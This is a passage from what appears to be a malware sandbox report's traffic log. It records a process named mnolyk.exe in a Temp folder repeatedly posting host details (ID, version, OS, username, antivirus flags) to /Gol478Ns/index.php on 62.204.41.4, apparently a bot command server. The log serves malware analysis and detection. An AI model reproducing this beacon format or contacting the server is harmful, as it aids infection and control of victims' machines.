                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:25.668282032 CET | 547 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      109 | 192.168.2.7 | 49834 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:25.833187103 CET | 548 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:25.896348000 CET | 548 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      11 | 192.168.2.7 | 49735 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:00.278414965 CET | 442 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:00.341404915 CET | 443 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      110 | 192.168.2.7 | 49835 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:26.067780972 CET | 549 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:26.131688118 CET | 549 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      111 | 192.168.2.7 | 49836 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:26.304985046 CET | 550 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:26.368634939 CET | 550 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      112 | 192.168.2.7 | 49837 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:26.550389051 CET | 550 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:26.612377882 CET | 551 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      113 | 192.168.2.7 | 49838 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:26.789628983 CET | 552 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:26.853873014 CET | 552 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      114 | 192.168.2.7 | 49839 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:27.025983095 CET | 553 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:27.091368914 CET | 553 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      115 | 192.168.2.7 | 49840 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:27.290138006 CET | 554 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:27.353770018 CET | 554 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      116 | 192.168.2.7 | 49841 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:27.522197008 CET | 555 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:27.586823940 CET | 555 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      117 | 192.168.2.7 | 49842 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:27.765216112 CET | 556 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:27.829616070 CET | 556 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      118 | 192.168.2.7 | 49843 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:28.008838892 CET | 557 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:28.074860096 CET | 557 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      119 | 192.168.2.7 | 49844 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:28.246222019 CET | 558 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:28.308918953 CET | 558 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      12 | 192.168.2.7 | 49736 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:00.525448084 CET | 444 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:00.590553045 CET | 444 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:00 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      120 | 192.168.2.7 | 49846 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:28.476052046 CET | 565 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:28.537834883 CET | 566 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      121 | 192.168.2.7 | 49847 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:28.712472916 CET | 566 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:28.774358988 CET | 567 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      122 | 192.168.2.7 | 49848 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:28.944538116 CET | 567 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.009571075 CET | 568 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      123 | 192.168.2.7 | 49849 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:29.177906036 CET | 568 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.243168116 CET | 569 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      124 | 192.168.2.7 | 49850 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:29.439543962 CET | 569 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:29.503218889 CET | 570 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:29 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
